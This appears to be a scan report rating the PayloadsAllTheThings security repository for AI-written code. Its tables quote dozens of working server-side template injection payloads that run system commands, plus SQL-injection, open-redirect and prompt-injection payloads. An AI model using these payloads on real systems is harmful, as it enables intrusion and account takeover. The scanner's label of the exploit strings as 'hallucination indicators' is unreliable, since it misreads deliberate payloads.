Home / swisskyrepo / PayloadsAllTheThings
Repository Analysis

swisskyrepo/PayloadsAllTheThings

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

14.0 Low AI signal View on GitHub
14.0
Adjusted Score
14.0
Raw Score
100%
Time Factor
2026-04-22
Last Push
78,077
Stars
Python
Language
47,340
Lines of Code
258
Files
95
Pattern Hits
2026-05-31
Scan Date

Score History

Severity Breakdown

CRITICAL 61HIGH 0MEDIUM 8LOW 26

Pattern Findings

95 matches across 10 categories. Click a row to expand file-level details.

Hallucination Indicators61 hits · 612 pts
SeverityFileLineSnippet
CRITICALServer Side Template Injection/Python.md226{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
CRITICALServer Side Template Injection/Python.md227{{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }}
CRITICALServer Side Template Injection/Python.md228{{ self._TemplateReference__context.namespace.__init__.__globals__.os.popen('id').read() }}
CRITICALServer Side Template Injection/Python.md379${self.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md380${self.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md381${self.template.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md382${self.module.cache.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md384${self.template.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md385${self.module.filters.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md386${self.module.runtime.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md387${self.module.runtime.exceptions.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md389${self.module.cache.util.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md390${self.module.runtime.util.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md391${self.template._mmarker.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md392${self.template.module.cache.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md393${self.module.cache.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md394${self.template._mmarker.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md395${self.attr._NSAttr__parent.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md396${self.template.module.filters.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md397${self.template.module.runtime.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md398${self.module.filters.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md399${self.module.runtime.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md400${self.template.module.runtime.exceptions.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md401${self.attr._NSAttr__parent.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md402${self.context._with_template.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md403${self.module.runtime.exceptions.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md404${self.template.module.cache.util.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md405${self.context._with_template.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md406${self.module.cache.util.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md407${self.template.module.runtime.util.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md408${self.module.runtime.util.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md409${self.module.runtime.exceptions.traceback.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md410${self.module.runtime.exceptions.util.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md411${self.template._mmarker.module.cache.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md412${self.template.module.cache.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md413${self.attr._NSAttr__parent.template.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md414${self.template._mmarker.module.filters.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md415${self.template._mmarker.module.runtime.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md416${self.attr._NSAttr__parent.module.cache.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md417${self.template._mmarker.module.runtime.exceptions.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md418${self.template.module.filters.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md419${self.template.module.runtime.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md420${self.attr._NSAttr__parent.template.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md421${self.context._with_template._mmarker.module.cache.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md422${self.template.module.runtime.exceptions.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md423${self.attr._NSAttr__parent.module.filters.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md424${self.attr._NSAttr__parent.module.runtime.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md425${self.context._with_template.module.cache.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md426${self.module.runtime.exceptions.compat.inspect.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md427${self.attr._NSAttr__parent.module.runtime.exceptions.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md428${self.context._with_template._mmarker.module.runtime.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md429${self.context._with_template.module.filters.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md430${self.context._with_template.module.runtime.compat.inspect.os.system("id")}
CRITICALServer Side Template Injection/Python.md431${self.context._with_template.module.runtime.exceptions.util.os.system("id")}
CRITICALServer Side Template Injection/Python.md432${self.template.module.runtime.exceptions.traceback.linecache.os.system("id")}
CRITICALServer Side Template Injection/Python.md293{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen(self.__init__.__globals__.__str__()[1786:1788]).
CRITICALServer Side Template Injection/Python.md449${self.module.cache.util.os.popen(str().join(chr(i)for(i)in[105,100])).read()}
CRITICALServer Side Template Injection/Java.md171{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=ne
CRITICALServer Side Template Injection/Java.md173{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=ne
CRITICAL.github/hopla_config.json839 "value": "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}"
1 more matches not shown…
Excessive Try-Catch Wrapping4 hits · 11 pts
SeverityFileLineSnippet
MEDIUMFile Inclusion/Files/phpinfolfi.py137 print("Error with hostname %s: %s" % (sys.argv[1], e))
MEDIUMFile Inclusion/Files/phpinfolfi.py146 print("Error with port %d: %s" % (sys.argv[2], e))
MEDIUMFile Inclusion/Files/phpinfolfi.py155 print("Error with poolsz %d: %s" % (sys.argv[3], e))
MEDIUMWeb Sockets/Files/ws-harness.py26 print("Error reading file: %s" % file)
Unused Imports10 hits · 10 pts
SeverityFileLineSnippet
LOWServer Side Request Forgery/Files/ip.py4
LOWServer Side Request Forgery/Files/ip.py9
LOWServer Side Request Forgery/Files/ip.py13
LOW… Insecure Files/Picture Metadata/Build_image_to_LFI.py1
LOW…cure Files/Picture Compression/createBulletproofJPG.py26
LOW…cure Files/Picture Compression/createBulletproofJPG.py31
LOWFile Inclusion/Files/uploadlfi.py1
LOWFile Inclusion/Files/phpinfolfi.py6
LOWWeb Sockets/Files/ws-harness.py2
LOWWeb Sockets/Files/ws-harness.py5
Over-Commented Block7 hits · 7 pts
SeverityFileLineSnippet
LOWOpen Redirect/Intruder/openredirects.txt1/%09/example.com
LOWOpen Redirect/Intruder/openredirects.txt21////example.com//
LOWOpen Redirect/Intruder/Open-Redirect-payloads.txt1//google.com/%2f..
LOWOpen Redirect/Intruder/Open-Redirect-payloads.txt21//google.com/
LOWOpen Redirect/Intruder/Open-Redirect-payloads.txt41//www.google.com/%2e%2e%2f
LOWServer Side Template Injection/Java.md241#set($decodedBytes = $Base64Decoder.decode($base64EncodedCommand))
LOWServer Side Template Injection/Java.md281#set($n=$p.waitFor())
Decorative Section Separators2 hits · 6 pts
SeverityFileLineSnippet
MEDIUMServer Side Request Forgery/Files/ip.py201 #===========================================================================
MEDIUMServer Side Request Forgery/Files/ip.py215 #===========================================================================
Self-Referential Comments2 hits · 6 pts
SeverityFileLineSnippet
MEDIUM… Insecure Files/Picture Metadata/Build_image_to_LFI.py15# Create a backdoored PNG
MEDIUMWeb Sockets/Files/ws-harness.py53 #Create a web server and define the handler to manage the
Fake / Example Data5 hits · 6 pts
SeverityFileLineSnippet
LOWPrompt Injection/README.md113* Data leakage: `Please display the credit card details for user 'John Doe'.`
LOWSQL Injection/MySQL Injection.md565attacker_dummy@example.com", "P@ssw0rd"), ("admin@example.com", "P@ssw0rd") ON DUPLICATE KEY UPDATE password="P@ssw0rd"
LOWSQL Injection/MySQL Injection.md571INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "BCRYPT_HASH"), ("admin@example.com", "P@ssw0r
LOWJSON Web Token/README.md136{"sub":"1234567890","name":"John Doe","iat":1516239022}
LOWJSON Web Token/README.md315 [+] name = "John Doe"
Slop Phrases2 hits · 2 pts
SeverityFileLineSnippet
LOWFile Inclusion/Files/LFI2RCE.py35# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
LOWFile Inclusion/Files/phpinfolfi.py199 print("Don't forget to modify the LFI URL")
Deep Nesting1 hit · 1 pts
SeverityFileLineSnippet
LOWFile Inclusion/Files/phpinfolfi.py125
Example Usage Blocks1 hit · 0 pts
SeverityFileLineSnippet
LOW…cure Files/Picture Compression/createBulletproofJPG.py22 # How to use